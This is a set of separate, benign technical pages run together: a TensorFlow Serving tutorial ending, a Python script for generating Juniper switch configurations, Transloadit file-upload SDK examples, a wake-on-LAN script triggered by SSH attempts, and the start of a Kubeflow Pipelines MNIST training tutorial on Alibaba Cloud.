rest_api_port: the port that you'll use for REST requests.
model_name: you'll use this in the URL of REST requests. It can be anything.
model_base_path: this is the path to the directory where you've saved your model.
os.environ["MODEL_DIR"] = MODEL_DIR
%%bash --bg
nohup tensorflow_model_server \
--rest_api_port=8501 \
--model_name=fashion_model \
--model_base_path="${MODEL_DIR}" >server.log 2>&1
Starting job # 0 in a separate thread.
!tail server.log
[warn] getaddrinfo: address family for nodename not supported [evhttp_server.cc : 238] NET_LOG: Entering the event loop ...
Make a request to your model in TensorFlow Serving
First, let's take a look at a random example from our test data.
def show(idx, title):
plt.figure()
plt.imshow(test_images[idx].reshape(28,28))
plt.axis('off')
plt.title('\n\n{}'.format(title), fontdict={'size': 16})
import random
rando = random.randint(0,len(test_images)-1)
show(rando, 'An Example Image: {}'.format(class_names[test_labels[rando]]))
Ok, that looks interesting. How hard would it be for you to recognize it? Now let's create the JSON object for a batch of three inference requests and see how well our model recognizes things:
import json
data = json.dumps({"signature_name": "serving_default", "instances": test_images[0:3].tolist()})
print('Data: {} ... {}'.format(data[:50], data[len(data)-52:]))
Data: {"signature_name": "serving_default", "instances": ... [0.0], [0.0], [0.0], [0.0], [0.0], [0.0], [0.0]]]]}
Make REST requests
Newest version of the servable
We'll send a predict request as a POST to our server's REST endpoint and pass it three examples. We'll ask our server to give us the latest version of our servable by not specifying a particular version.
!pip install -q requests
import requests
headers = {"content-type": "application/json"}
json_response = requests.post('http://localhost:8501/v1/models/fashion_model:predict', data=data, headers=headers)
predictions = json.loads(json_response.text)['predictions']
show(0, 'The model thought this was a {} (class {}), and it was actually a {} (class {})'.format(
class_names[np.argmax(predictions[0])], np.argmax(predictions[0]), class_names[test_labels[0]], test_labels[0]))
A particular version of the servable
Now let's specify a particular version of our servable. Since we only have one, let's select version 1. We'll also look at all three results.
headers = {"content-type": "application/json"}
json_response = requests.post('http://localhost:8501/v1/models/fashion_model/versions/1:predict', data=data, headers=headers)
predictions = json.loads(json_response.text)['predictions']
for i in range(0,3):
show(i, 'The model thought this was a {} (class {}), and it was actually a {} (class {})'.format(
class_names[np.argmax(predictions[i])], np.argmax(predictions[i]), class_names[test_labels[i]], test_labels[i]))
|
One of the first things that I'd like to highlight that has helped me in my role as a network engineer is using Python to create uniform network configurations for branch sites. Essentially, I use a "cookie cutter" device template in which I've replaced the site-specific details with variables, and a Python script that automatically builds out the configuration for the device. From here the script could easily be extended to build the router configurations, populate the network monitoring system with the new devices, and even push the configuration out to the devices automatically. I wanted to keep this post bite-sized and show that Python doesn't need to be connected to the devices directly to be highly useful.
There are a few things to note before we get started:
These examples were created for Juniper EX4300 switches, though they can easily be repurposed for any other model or vendor of network equipment.
The Python script was written with Python 3.7 and doesn't work on earlier versions.
The device template assumes an IP scheme using /16 subnets to differentiate between locations.
The first step is to build out a device template configuration and then replace the site-specific information with variables.
In this example you can see how I've created the variables at the top for location, hostname, and site-specific IP information. I've also added comments in the configuration that are used as variables only when more than two switches are required for the site (if not used, they are simply ignored as comments).
#Switch Template
#
#Replace following variables with site specific info:
#
#Description of Item - [variable name]
#hostname - [hostname]
#Branch number - [xx]
#City Name - [name]
#City-State - [location]
#Switch 01 Serial Number - [serial_1]
#Switch 02 Serial Number - [serial_2]
#Port configuration if more than 2 switches - /*additional_swch_ports*/
#Virtual Chassis configuration if more than two switches - /*additional_swch_vr_chas*/
#
# Load the following configuration on the switch core
set system host-name [hostname]
set system services dhcp-local-server group server1 interface irb.1
set system services dhcp-local-server group server2 interface irb.2
set system commit synchronize
set chassis redundancy graceful-switchover
set chassis alarm management-ethernet link-down ignore
set interfaces interface-range access_ports member-range ge-0/0/1 to ge-0/0/47
set interfaces interface-range access_ports member-range ge-1/0/0 to ge-1/0/47
/*additional_swch_ports*/
set interfaces interface-range access_ports unit 0 family ethernet-switching interface-mode access
set interfaces interface-range access_ports unit 0 family ethernet-switching vlan members vlan1
set interfaces ge-0/0/0 description "Uplink to RTR01"
set interfaces ge-0/0/0 unit 0 family inet address 10.[xx].3.1/24
set interfaces irb unit 1 description "Data Network"
set interfaces irb unit 1 family inet address 10.[xx].1.1/24
set interfaces irb unit 2 description "Voice Network"
set interfaces irb unit 2 family inet address 10.[xx].2.1/24
set interfaces lo0 unit 0 family inet address 10.[xx].255.3/32
set snmp location "[location]"
set routing-options nonstop-routing
set protocols ospf area 0.0.0.0 interface ge-0/0/0.0
set protocols ospf area 0.0.0.0 interface lo0.0 passive
set protocols ospf area 0.0.0.0 interface irb.1 passive
set protocols ospf area 0.0.0.0 interface irb.2 passive
set access address-assignment pool pool1 family inet network 10.[xx].1.0/24
set access address-assignment pool pool1 family inet range range1 low 10.[xx].1.20
set access address-assignment pool pool1 family inet range range1 high 10.[xx].1.200
set access address-assignment pool pool2 family inet network 10.[xx].2.0/24
set access address-assignment pool pool2 family inet range range1 low 10.[xx].2.20
set access address-assignment pool pool2 family inet range range1 high 10.[xx].2.200
set switch-options voip interface access_ports vlan vlan2
set switch-options voip interface access_ports forwarding-class expedited-forwarding
set virtual-chassis preprovisioned
set virtual-chassis member 0 role routing-engine
set virtual-chassis member 0 serial-number [serial_1]
set virtual-chassis member 1 role routing-engine
set virtual-chassis member 1 serial-number [serial_2]
/*additional_swch_vr_chas*/
set vlans vlan1 description "Data Vlan"
set vlans vlan1 vlan-id 1
set vlans vlan1 l3-interface irb.1
set vlans vlan2 description "Voice Vlan"
set vlans vlan2 vlan-id 2
set vlans vlan2 l3-interface irb.2
The second step is to build out a Python script to match and replace the variables in the switch template.
Import switch_template file
t = open(r"switch_template.txt", "r")
tempstr = t.read()
t.close()
Ask user for site information
print('What is the hostname of the device?')
hostname = input()
print('What is the branch IP number? Example: type 28 for 10.28.10.1')
ipxx = input()
print('What City is the branch in? Example: Paris')
city = input()
print('What State or Country is the branch in? Example: France')
state = input()
city_state = city + ", " + state  # combined into the [location] format, e.g. "Paris, France"
print('How many switches will the branch have?')
switch_number = int(input())
switch_dict = {}
for i in range(switch_number):
switchnumber = i
print("What is the serial number of switch ",i,"?")
switch_dict.update( {switchnumber: input()})
If there are more than two switches, create additional lines of configuration for the ports and virtual chassis
add_sw_ports = ""
add_sw_vr_chass = ""
for k, v in switch_dict.items():
if k > 1:
k = str(k)
add_sw_ports += ("set interfaces interface-range access_ports member-range ge-"+k+"/0/1 to ge-"+k+"/0/47\n")
add_sw_vr_chass += ("set virtual-chassis member "+k+" serial-number "+v+" role line-card\n")
Create a dictionary that maps the variables in switch_template to the newly created values
device_values = {
'[hostname]': hostname,
'[xx]': ipxx,
'[name]': city,
'[location]': city_state,
'[serial_1]': switch_dict[0],
'[serial_2]': switch_dict[1],
'/*additional_swch_ports*/': add_sw_ports,
'/*additional_swch_vr_chas*/': add_sw_vr_chass,
}
Finally, replace the variables in switch_template with the newly created values and print the result
for key,val in device_values.items():
tempstr = tempstr.replace(key,val)
print(tempstr)
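If you would rather write the rendered configuration to a file than print it to the screen, a small optional addition at the end will do it (the filename convention here is just an example):
with open(hostname + "_config.txt", "w") as f:
    f.write(tempstr)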
You can find the example switch template and Python script on my GitHub account:
|
We are a Swiss Army knife for your files
Transloadit is a service for companies with developers. We handle their file uploads and media processing. This means that they can save on development time and the heavy machinery that is required to handle big volumes in an automated way.
We pioneered this concept in 2009 and have made our customers happy ever since. We are still actively improving our service in 2021, as well as our open source projects uppy.io and tus.io, which are changing how the world does file uploading.
1. Handle uploads
We can handle uploads of your users directly. Learn more ›
2. Compress files
We can both archive and extract entire media libraries. Learn more ›
3. Export files to Amazon S3
We export to the storage platform of your choice. Learn more ›
Once all files have been exported, we can ping a URL of your choice with the Assembly status JSON.
Build this in your own language
{
":original": {
"robot": "/upload/handle"
},
"archived": {
"use": {
"steps": [
":original"
],
"bundle_steps": true
},
"robot": "/file/compress",
"result": true,
"format": "zip"
},
"exported": {
"use": [
"archived",
":original"
],
"robot": "/s3/store",
"credentials": "YOUR_AWS_CREDENTIALS",
"url_prefix": "https://demos.transloadit.com/"
}
}
# Prerequisites: brew install curl jq || sudo apt install curl jq
# To avoid tampering, use Signature Authentication
echo '{
"auth": {
"key": "YOUR_TRANSLOADIT_KEY"
},
"steps": {
":original": {
"robot": "/upload/handle"
},
"archived": {
"use": {
"steps": [
":original"
],
"bundle_steps": true
},
"robot": "/file/compress",
"result": true,
"format": "zip"
},
"exported": {
"use": [
"archived",
":original"
],
"robot": "/s3/store",
"credentials": "YOUR_AWS_CREDENTIALS",
"url_prefix": "https://demos.transloadit.com/"
}
}
}' |curl \
--request POST \
--form 'params=<-' \
--form my_file1=@./ben-o-sullivan-382817.jpg \
--form my_file2=@./anete-lusina-382336.jpg \
https://api2.transloadit.com/assemblies \
|jq
// Add 'Transloadit' to your Podfile, run 'pod install', add credentials to 'Info.plist'
import Arcane
import TransloaditKit
// Set Encoding Instructions
var AssemblySteps: Array = Array<Step>() // An array to hold the Steps
var Step1 = Step (key: ":original") // Create a Step object
Step1?.setValue("/upload/handle", forOption: "robot") // Add the details
AssemblySteps.append(Step1) // Add the Step to the array
var Step2 = Step (key: "archived") // Create a Step object
Step2?.setValue(["steps": [":original"], "bundle_steps": true], forOption: "use") // Add the details
Step2?.setValue("/file/compress", forOption: "robot") // Add the details
Step2?.setValue(true, forOption: "result") // Add the details
Step2?.setValue("zip", forOption: "format") // Add the details
AssemblySteps.append(Step2) // Add the Step to the array
var Step3 = Step (key: "exported") // Create a Step object
Step3?.setValue(["archived",":original"], forOption: "use") // Add the details
Step3?.setValue("/s3/store", forOption: "robot") // Add the details
Step3?.setValue("YOUR_AWS_CREDENTIALS", forOption: "credentials") // Add the details
Step3?.setValue("https://demos.transloadit.com/", forOption: "url_prefix") // Add the details
AssemblySteps.append(Step3) // Add the Step to the array
// We then create an Assembly Object with the Steps and files
var MyAssembly: Assembly = Assembly(steps: AssemblySteps, andNumberOfFiles: 1)
// Add files to upload
MyAssembly.addFile("./ben-o-sullivan-382817.jpg")
MyAssembly.addFile("./anete-lusina-382336.jpg")
// Start the Assembly
Transloadit.createAssembly(MyAssembly)
// Fires after your Assembly has completed
transloadit.assemblyStatusBlock = {(_ completionDictionary: [AnyHashable: Any]) -> Void in
print("\(completionDictionary.description)")
}
<body>
<form action="/uploads" enctype="multipart/form-data" method="POST">
<input type="file" name="my_file" multiple="multiple" />
</form>
<script src="//ajax.googleapis.com/ajax/libs/jquery/3.2.0/jquery.min.js"></script>
<script src="//assets.transloadit.com/js/jquery.transloadit2-v3-latest.js"></script>
<script type="text/javascript">
$(function() {
$('form').transloadit({
wait: true,
triggerUploadOnFileSelection: true,
params: {
auth: {
// To avoid tampering use signatures:
// https://transloadit.com/docs/api/#authentication
key: 'YOUR_TRANSLOADIT_KEY',
},
// It's often better to store encoding instructions in your account
// and use a `template_id` instead of adding these steps inline
steps: {
':original': {
robot: '/upload/handle'
},
archived: {
use: {'steps':[':original'],'bundle_steps':true},
robot: '/file/compress',
result: true,
format: 'zip'
},
exported: {
use: ['archived',':original'],
robot: '/s3/store',
credentials: 'YOUR_AWS_CREDENTIALS',
url_prefix: 'https://demos.transloadit.com/'
}
}
}
});
});
</script>
</body>
<!-- This pulls Uppy from our CDN. Alternatively use `npm i @uppy/robodog --save` -->
<!-- if you want smaller self-hosted bundles and/or to use modern JavaScript -->
<link href="//releases.transloadit.com/uppy/robodog/v1.6.7/robodog.min.css" rel="stylesheet">
<script src="//releases.transloadit.com/uppy/robodog/v1.6.7/robodog.min.js"></script>
<button id="browse">Select Files</button>
<script>
document.getElementById('browse').addEventListener('click', function () {
var uppy = window.Robodog.pick({
providers: [ 'instagram', 'url', 'webcam', 'dropbox', 'google-drive', 'facebook', 'onedrive' ],
waitForEncoding: true,
params: {
// To avoid tampering, use Signature Authentication
auth: { key: 'YOUR_TRANSLOADIT_KEY' },
// To hide your `steps`, use a `template_id` instead
steps: {
':original': {
robot: '/upload/handle'
},
archived: {
use: {'steps':[':original'],'bundle_steps':true},
robot: '/file/compress',
result: true,
format: 'zip'
},
exported: {
use: ['archived', ':original'],
robot: '/s3/store',
credentials: 'YOUR_AWS_CREDENTIALS',
url_prefix: 'https://demos.transloadit.com/'
}
}
}
}).then(function (bundle) {
// Due to `waitForEncoding: true` this is fired after encoding is done.
// Alternatively, set `waitForEncoding` to `false` and provide a `notify_url`
// for Async Mode where your back-end receives the encoding results
// so that your user can be on their way as soon as the upload completes.
console.log(bundle.transloadit) // Array of Assembly Statuses
console.log(bundle.results) // Array of all encoding results
}).catch(console.error)
})
</script>
// yarn add transloadit || npm i transloadit --save-exact
const Transloadit = require('transloadit')
const transloadit = new Transloadit({
authKey: 'YOUR_TRANSLOADIT_KEY',
authSecret: 'YOUR_TRANSLOADIT_SECRET'
})
// Set Encoding Instructions
const options = {
params: {
steps: {
':original': {
robot: '/upload/handle',
},
archived: {
use: {'steps':[':original'],'bundle_steps':true},
robot: '/file/compress',
result: true,
format: 'zip',
},
exported: {
use: ['archived',':original'],
robot: '/s3/store',
credentials: 'YOUR_AWS_CREDENTIALS',
url_prefix: 'https://demos.transloadit.com/',
},
}
}
}
// Add files to upload
transloadit.addFile('myfile_1', './ben-o-sullivan-382817.jpg')
transloadit.addFile('myfile_2', './anete-lusina-382336.jpg')
// Start the Assembly
transloadit.createAssembly(options, (err, result) => {
if (err) {
throw err
}
console.log({result})
})
[sudo] npm install transloadify -g
export TRANSLOADIT_KEY="YOUR_TRANSLOADIT_KEY"
export TRANSLOADIT_SECRET="YOUR_TRANSLOADIT_SECRET"
# Save Encoding Instructions
echo '{
":original": {
"robot": "/upload/handle"
},
"archived": {
"use": {
"steps": [
":original"
],
"bundle_steps": true
},
"robot": "/file/compress",
"result": true,
"format": "zip"
},
"exported": {
"use": [
"archived",
":original"
],
"robot": "/s3/store",
"credentials": "YOUR_AWS_CREDENTIALS",
"url_prefix": "https://demos.transloadit.com/"
}
}' > ./steps.json
transloadify \
--input "./ben-o-sullivan-382817.jpg" \
--input "./anete-lusina-382336.jpg" \
--output "./output.example" \
--steps "./steps.json"
// composer require transloadit/php-sdk
use transloadit\Transloadit;
$transloadit = new Transloadit([
"key" => "YOUR_TRANSLOADIT_KEY",
"secret" => "YOUR_TRANSLOADIT_SECRET",
]);
// Add files to upload
$files = [];
array_push($files, "./ben-o-sullivan-382817.jpg");
array_push($files, "./anete-lusina-382336.jpg");
// Start the Assembly
$response = $transloadit->createAssembly([
"files" => $files,
"params" => [
"steps" => [
":original" => [
"robot" => "/upload/handle",
],
"archived" => [
"use" => [
"steps" => [":original"],
"bundle_steps" => true,
],
"robot" => "/file/compress",
"result" => true,
"format" => "zip",
],
"exported" => [
"use" => ["archived", ":original"],
"robot" => "/s3/store",
"credentials" => "YOUR_AWS_CREDENTIALS",
"url_prefix" => "https://demos.transloadit.com/",
],
],
],
]);
# gem install transloadit
transloadit = Transloadit.new(
:key => "YOUR_TRANSLOADIT_KEY",
:secret => "YOUR_TRANSLOADIT_SECRET"
)
# Set Encoding Instructions
original = transloadit.step ":original", "/upload/handle"
archived = transloadit.step "archived", "/file/compress",
  :use => { :steps => [":original"], :bundle_steps => true },
  :result => true,
  :format => "zip"
exported = transloadit.step "exported", "/s3/store",
  :use => ["archived", ":original"],
  :credentials => "YOUR_AWS_CREDENTIALS",
  :url_prefix => "https://demos.transloadit.com/"
assembly = transloadit.assembly(
  :steps => [original, archived, exported]
)
# Add files to upload
files = []
files.push("./ben-o-sullivan-382817.jpg")
files.push("./anete-lusina-382336.jpg")
# Start the Assembly
response = assembly.create! *files
until response.finished?
sleep 1; response.reload!
end
if !response.error?
# handle success
end
# pip install pytransloadit
from transloadit import client
tl = client.Transloadit('YOUR_TRANSLOADIT_KEY', 'YOUR_TRANSLOADIT_SECRET')
assembly = tl.new_assembly()
# Set Encoding Instructions
assembly.add_step(':original', {
'robot': '/upload/handle'
})
assembly.add_step('archived', {
'use': {'steps': [':original'], 'bundle_steps': True},
'robot': '/file/compress',
'result': True,
'format': 'zip'
})
assembly.add_step('exported', {
'use': ['archived',':original'],
'robot': '/s3/store',
'credentials': 'YOUR_AWS_CREDENTIALS',
'url_prefix': 'https://demos.transloadit.com/'
})
# Add files to upload
assembly.add_file(open('./ben-o-sullivan-382817.jpg', 'rb'))
assembly.add_file(open('./anete-lusina-382336.jpg', 'rb'))
# Start the Assembly
assembly_response = assembly.create(retries=5, wait=True)
print(assembly_response.data.get('assembly_id'))
# or
print(assembly_response.data['assembly_id'])
// go get gopkg.in/transloadit/go-sdk.v1
package main

import (
    "context"
    "fmt"

    "gopkg.in/transloadit/go-sdk.v1"
)

func main() {
    options := transloadit.DefaultConfig
    options.AuthKey = "YOUR_TRANSLOADIT_KEY"
    options.AuthSecret = "YOUR_TRANSLOADIT_SECRET"
    client := transloadit.NewClient(options)
    // Initialize new Assembly
    assembly := transloadit.NewAssembly()
    // Set Encoding Instructions
    assembly.AddStep(":original", map[string]interface{}{
        "robot": "/upload/handle",
    })
    assembly.AddStep("archived", map[string]interface{}{
        "use": map[string]interface{}{
            "steps":        []string{":original"},
            "bundle_steps": true,
        },
        "robot":  "/file/compress",
        "result": true,
        "format": "zip",
    })
    assembly.AddStep("exported", map[string]interface{}{
        "use":         []string{"archived", ":original"},
        "robot":       "/s3/store",
        "credentials": "YOUR_AWS_CREDENTIALS",
        "url_prefix":  "https://demos.transloadit.com/",
    })
    // Add files to upload
    assembly.AddFile("myfile_1", "./ben-o-sullivan-382817.jpg")
    assembly.AddFile("myfile_2", "./anete-lusina-382336.jpg")
    // Start the Assembly
    info, err := client.StartAssembly(context.Background(), assembly)
    if err != nil {
        panic(err)
    }
    // All files have now been uploaded and the Assembly has started but no
    // results are available yet since the conversion has not finished.
    // WaitForAssembly provides functionality for polling until the Assembly
    // has ended.
    info, err = client.WaitForAssembly(context.Background(), info)
    if err != nil {
        panic(err)
    }
    fmt.Printf("You can check some results at: \n")
    fmt.Printf(" - %s\n", info.Results[":original"][0].SSLURL)
    fmt.Printf(" - %s\n", info.Results["archived"][0].SSLURL)
    fmt.Printf(" - %s\n", info.Results["exported"][0].SSLURL)
}
// compile 'com.transloadit.sdk:transloadit:0.1.5'
import com.transloadit.sdk.Assembly;
import com.transloadit.sdk.Transloadit;
import com.transloadit.sdk.exceptions.LocalOperationException;
import com.transloadit.sdk.exceptions.RequestException;
import com.transloadit.sdk.response.AssemblyResponse;
import java.io.File;
import java.util.HashMap;
import java.util.Map;
public class Main {
public static void main(String[] args) {
Transloadit transloadit = new Transloadit("YOUR_TRANSLOADIT_KEY", "YOUR_TRANSLOADIT_SECRET");
Assembly assembly = transloadit.newAssembly();
// Set Encoding Instructions
Map<String, Object> originalStepOptions = new HashMap();
assembly.addStep(":original", "/upload/handle", originalStepOptions);
Map<String, Object> archivedStepOptions = new HashMap();
archivedStepOptions.put("use", new HashMap(){{
put("steps", new String[]{":original"});
put("bundle_steps", true);
}});
archivedStepOptions.put("result", true);
archivedStepOptions.put("format", "zip");
assembly.addStep("archived", "/file/compress", archivedStepOptions);
Map<String, Object> exportedStepOptions = new HashMap();
exportedStepOptions.put("use", new String[]{"archived", ":original"});
exportedStepOptions.put("credentials", "YOUR_AWS_CREDENTIALS");
exportedStepOptions.put("url_prefix", "https://demos.transloadit.com/");
assembly.addStep("exported", "/s3/store", exportedStepOptions);
// Add files to upload
assembly.addFile(new File("./ben-o-sullivan-382817.jpg"));
assembly.addFile(new File("./anete-lusina-382336.jpg"));
// Start the Assembly
try {
AssemblyResponse response = assembly.save();
// Wait for Assembly to finish executing
while (!response.isFinished()) {
response = transloadit.getAssemblyByUrl(response.getSslUrl());
}
System.out.println(response.getId());
System.out.println(response.getUrl());
System.out.println(response.json());
} catch (RequestException | LocalOperationException e) {
// Handle exception here
}
}
}
So many ways to integrate
Bulk imports
Add one of our import Robots to acquire and transcode massive media libraries.
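For example, an import Step using our /http/import Robot might look like this (a sketch; the source URL is a placeholder):
"imported": {
  "robot": "/http/import",
  "url": "https://example.com/media-library/photo-0001.jpg"
}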
Handling uploads
Front-end integration
We integrate with web browsers via our next-gen file uploader Uppy and SDKs for Android and iOS.
Back-end integration
Pingbacks
Configure a notify_url to let your server receive the transcoding results JSON in the transloadit POST field.
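For instance, adding a notify_url to the params shown in the examples above is all it takes for your back-end to receive the results (the endpoint here is a placeholder):
{
  "auth": { "key": "YOUR_TRANSLOADIT_KEY" },
  "notify_url": "https://example.com/transloadit/pingback",
  "steps": { ... }
}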
|
#!/usr/bin/python
# wake up a host when people try to ssh to it.
# requires a iptables forward rule like this (ferm style):
#
# domain (ip ip6) table filter chain $ch
# daddr <ipv4addr>
# proto tcp dport 22 tcp-flags (SYN ACK FIN RST) SYN
# mod state state NEW
# mod limit limit 1/minute limit-burst 1
# NFLOG nflog-group 1371 nflog-prefix "ssh to valiant";
#
# run from cron:
# @reboot screen -d -S wol -m ./wol-valiant <aa:bb:cc:dd:ee:ff> <ipv4addr> <interface>
#
# Depends: wakeonlan python-dpkt python-nflog
# Copyright 2013-2017 Peter Palfrader
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import dpkt, nflog, socket, subprocess, sys, time
import optparse
NFLOG_GROUP = 1371
def cb(payload):
#print payload
#print payload.__dict__
#print "payload len ", payload.get_length()
data = payload.get_data()
pkt = dpkt.ip.IP(data)
#print "proto:", pkt.p
#print "source: %s" % socket.inet_ntoa(pkt.src)
#print "dest: %s" % socket.inet_ntoa(pkt.dst)
#if pkt.p == dpkt.ip.IP_PROTO_TCP:
# print " sport: %s" % pkt.tcp.sport
# print " dport: %s" % pkt.tcp.dport
#return 1
print "[%s] python callback called because of %s!"%(time.strftime("%Y-%m-%d %H:%M:%S"), socket.inet_ntoa(pkt.src))
subprocess.call(['wakeonlan', MAC])
subprocess.call(['ip', 'neigh', 'replace', IPADDR, 'lladdr', MAC, 'nud', 'stale', 'dev', INTERFACE])
sys.stdout.flush()
parser = optparse.OptionParser()
parser.set_usage("%prog <mac addr> <ip addr> <interface>")
(options, args) = parser.parse_args()
if len(args) != 3:
parser.print_help()
sys.exit(1)
MAC = args[0]
IPADDR = args[1]
INTERFACE = args[2]
l = nflog.log()
print "setting callback"
l.set_callback(cb)
print "open"
l.fast_open(NFLOG_GROUP, socket.AF_INET)
print "trying to run"
try:
l.try_run()
except KeyboardInterrupt, e:
print "interrupted"
print "unbind"
l.unbind(socket.AF_INET)
print "close"
l.close()
|
By Che Yang, nicknamed Biran at Alibaba.
In the previous article in this series, Unlock Cloud-native AI Skills | Build a Machine Learning System on Kubernetes, we set up a Kubeflow Pipelines platform. Now, we can try it out with a real case. Let's learn how to develop a Kubeflow Pipelines-based machine learning workflow.
A machine learning workflow is a task-driven and data-driven process. In this process, we import and prepare data, export and evaluate model training checkpoints, and export the final model. To do this, we need a distributed storage system as the transmission medium. In this example, we use network-attached storage (NAS) as the distributed storage. To do this, follow these steps:
Note that, in this tutorial, we use a NAS as the distributed storage, and we need to replace NFS_SERVER_IP with the real NAS server address.
2. Create /data in the network file system (NFS) server.
# mkdir -p /nfs
# mount -t nfs -o vers=4.0 NFS_SERVER_IP:/ /nfs
# mkdir -p /data
# cd /
# umount /nfs
3. Create a corresponding persistent volume.
# cat nfs-pv.yaml
apiVersion: v1
kind: PersistentVolume
metadata:
  name: user-susan
  labels:
    user-susan: pipelines
spec:
  persistentVolumeReclaimPolicy: Retain
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteMany
  nfs:
    server: NFS_SERVER_IP
    path: "/data"
# kubectl create -f nfs-pv.yaml
4. Create a persistent volume claim (PVC).
# cat nfs-pvc.yaml
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: user-susan
  annotations:
    description: "this is the mnist demo"
    owner: Tom
spec:
  accessModes:
  - ReadWriteMany
  resources:
    requests:
      storage: 5Gi
  selector:
    matchLabels:
      user-susan: pipelines
# kubectl create -f nfs-pvc.yaml
The examples provided on Kubeflow Pipelines depend on Google's storage service. As Google is inaccessible in China, users in China cannot truly experience the capabilities of Kubeflow Pipelines. For this reason, an example of training the Modified National Institute of Standards and Technology (MNIST) model based on Alibaba Cloud NAS was provided to help you get started with and learn about Kubeflow Pipelines on Alibaba Cloud. The example includes the following steps:
1. Download the MNIST data set.
2. Train the model.
3. Export the trained model.
Each of the three steps depends on the previous one.
You can use Python code to describe this process on Kubeflow Pipelines. For the complete code, see standalone_pipeline.py.
In this example, we use arena_op, an API based on the open-source Arena project that wraps Kubeflow's default container_op. It can seamlessly connect to the message passing interface (MPI) and parameter server (PS) modes of distributed training; it makes it easy to use heterogeneous devices such as GPUs and RDMA and to access distributed storage; and it can conveniently synchronize code from Git sources. It is a genuinely useful API tool.
@dsl.pipeline(
    name='pipeline to run jobs',
    description='shows how to run pipeline jobs.'
)
def sample_pipeline(learning_rate='0.01',
                    dropout='0.9',
                    model_version='1',
                    commit='f097575656f927d86d99dd64931042e1a9003cb2'):
    """A pipeline for end to end machine learning workflow."""
    data = ["user-susan:/training"]
    gpus = 1

    # 1. prepare data
    prepare_data = arena.standalone_job_op(
        name="prepare-data",
        image="byrnedo/alpine-curl",
        data=data,
        command="mkdir -p /training/dataset/mnist && \
          cd /training/dataset/mnist && \
          curl -O https://code.aliyun.com/xiaozhou/tensorflow-sample-code/raw/master/data/t10k-images-idx3-ubyte.gz && \
          curl -O https://code.aliyun.com/xiaozhou/tensorflow-sample-code/raw/master/data/t10k-labels-idx1-ubyte.gz && \
          curl -O https://code.aliyun.com/xiaozhou/tensorflow-sample-code/raw/master/data/train-images-idx3-ubyte.gz && \
          curl -O https://code.aliyun.com/xiaozhou/tensorflow-sample-code/raw/master/data/train-labels-idx1-ubyte.gz")

    # 2. download source code and train the models
    train = arena.standalone_job_op(
        name="train",
        image="tensorflow/tensorflow:1.11.0-gpu-py3",
        sync_source="https://code.aliyun.com/xiaozhou/tensorflow-sample-code.git",
        env=["GIT_SYNC_REV=%s" % (commit)],
        gpus=gpus,
        data=data,
        command='''
          echo %s;python code/tensorflow-sample-code/tfjob/docker/mnist/main.py \
          --max_steps 500 --data_dir /training/dataset/mnist \
          --log_dir /training/output/mnist --learning_rate %s \
          --dropout %s''' % (prepare_data.output, learning_rate, dropout),
        metrics=["Train-accuracy:PERCENTAGE"])

    # 3. export the model
    export_model = arena.standalone_job_op(
        name="export-model",
        image="tensorflow/tensorflow:1.11.0-py3",
        sync_source="https://code.aliyun.com/xiaozhou/tensorflow-sample-code.git",
        env=["GIT_SYNC_REV=%s" % (commit)],
        data=data,
        command="echo %s;python code/tensorflow-sample-code/tfjob/docker/mnist/export_model.py --model_version=%s --checkpoint_path=/training/output/mnist /training/output/models" % (train.output, model_version))
Kubeflow Pipelines converts the preceding code into a directed acyclic graph (DAG). Each node in the DAG is a component, and the lines connecting the components represent the dependencies between them. You can see the DAG on the Pipelines UI.
First, let's talk about data preparation. We have provided the Python API arena.standalone_job_op. Now we need to specify the following parameters: name (which is the name of this step), image (the container image to be used), and data (the data to be used and the directory to which the data is mounted within the container).
Here, data is in the array format. For example, data = ["user-susan:/training"] indicates multiple pieces of data that can be mounted, where user-susan is the previously created PVC, and /training is the directory to which the data is mounted within the container.
prepare_data = arena.standalone_job_op(
    name="prepare-data",
    image="byrnedo/alpine-curl",
    data=data,
    command="mkdir -p /training/dataset/mnist && \
      cd /training/dataset/mnist && \
      curl -O https://code.aliyun.com/xiaozhou/tensorflow-sample-code/raw/master/data/t10k-images-idx3-ubyte.gz && \
      curl -O https://code.aliyun.com/xiaozhou/tensorflow-sample-code/raw/master/data/t10k-labels-idx1-ubyte.gz && \
      curl -O https://code.aliyun.com/xiaozhou/tensorflow-sample-code/raw/master/data/train-images-idx3-ubyte.gz && \
      curl -O https://code.aliyun.com/xiaozhou/tensorflow-sample-code/raw/master/data/train-labels-idx1-ubyte.gz")
Actually, the preceding step uses curl to download the data from the specified address to the /training/dataset/mnist directory in the distributed storage. Note that /training is the root directory, which is similar to a root mounting point, and /training/dataset/mnist is a sub-directory of the distributed storage. In fact, in the following steps, the same root mounting point can be used to read data and perform operations.
The second step is to download code and train the model based on the data downloaded to the distributed storage. Before downloading the code, use Git to specify a fixed commit ID.
train = arena.standalone_job_op(
    name="train",
    image="tensorflow/tensorflow:1.11.0-gpu-py3",
    sync_source="https://code.aliyun.com/xiaozhou/tensorflow-sample-code.git",
    env=["GIT_SYNC_REV=%s" % (commit)],
    gpus=gpus,
    data=data,
    command='''
      echo %s;python code/tensorflow-sample-code/tfjob/docker/mnist/main.py \
      --max_steps 500 --data_dir /training/dataset/mnist \
      --log_dir /training/output/mnist --learning_rate %s \
      --dropout %s''' % (prepare_data.output, learning_rate, dropout),
    metrics=["Train-accuracy:PERCENTAGE"])
As you can see, this step is more complex than data preparation. In addition to the name, image, data, and command parameters used in the first step, the model training step needs the following:
